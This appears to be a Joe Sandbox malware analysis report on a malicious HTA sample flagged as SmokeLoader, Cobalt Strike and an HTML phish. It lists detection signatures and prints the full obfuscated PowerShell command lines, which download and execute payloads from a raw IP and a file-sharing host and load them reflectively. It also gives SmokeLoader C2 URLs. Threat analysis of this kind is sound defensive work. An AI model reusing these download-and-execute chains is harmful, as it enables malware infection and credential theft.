Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta

Overview

General Information

Sample name:bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta
Analysis ID:1557927
MD5:05dcffe1d8e8e209a90b522192ad8000
SHA1:77c19b392d39bce4906b5c4e5f1ab0a0c9182dc7
SHA256:35717c891450767af251ec90a7c05ffd407d7b2d2897d96c176c51b5b8a156b5
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, HTMLPhisher, SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Cobalt Strike Beacon
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Yara detected SmokeLoader
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to compare user and computer (likely to detect sandboxes)
Creates a thread in another existing process (thread injection)
Found evasive API chain (may stop execution after checking mutex)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 6736 cmdline: mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 5592 cmdline: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • csc.exe (PID: 6588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • cvtres.exe (PID: 5472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • wscript.exe (PID: 6964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
        • powershell.exe (PID: 6168 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • aspnet_compiler.exe (PID: 3636 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
              • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 4928 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 796 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 7100 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 3484 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                  • WerFault.exe (PID: 5368 cmdline: C:\Windows\system32\WerFault.exe -u -p 3484 -s 724 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
                • explorer.exe (PID: 692 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 5432 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
                • explorer.exe (PID: 3588 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
                • explorer.exe (PID: 2164 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • djvbaae (PID: 3052 cmdline: C:\Users\user\AppData\Roaming\djvbaae MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
    • conhost.exe (PID: 5548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
SourceRuleDescriptionAuthorStrings
bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security
    SourceRuleDescriptionAuthorStrings
    00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
      0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        0000000D.00000002.2178722261.0000000000E31000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
        • 0x1d4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
        0000001A.00000002.3006599543.0000000000721000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoaderYara detected SmokeLoaderJoe Security
          0000000D.00000002.2175832191.0000000000E10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            13.2.aspnet_compiler.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              SourceRuleDescriptionAuthorStrings
              amsi32_5568.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFT
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe
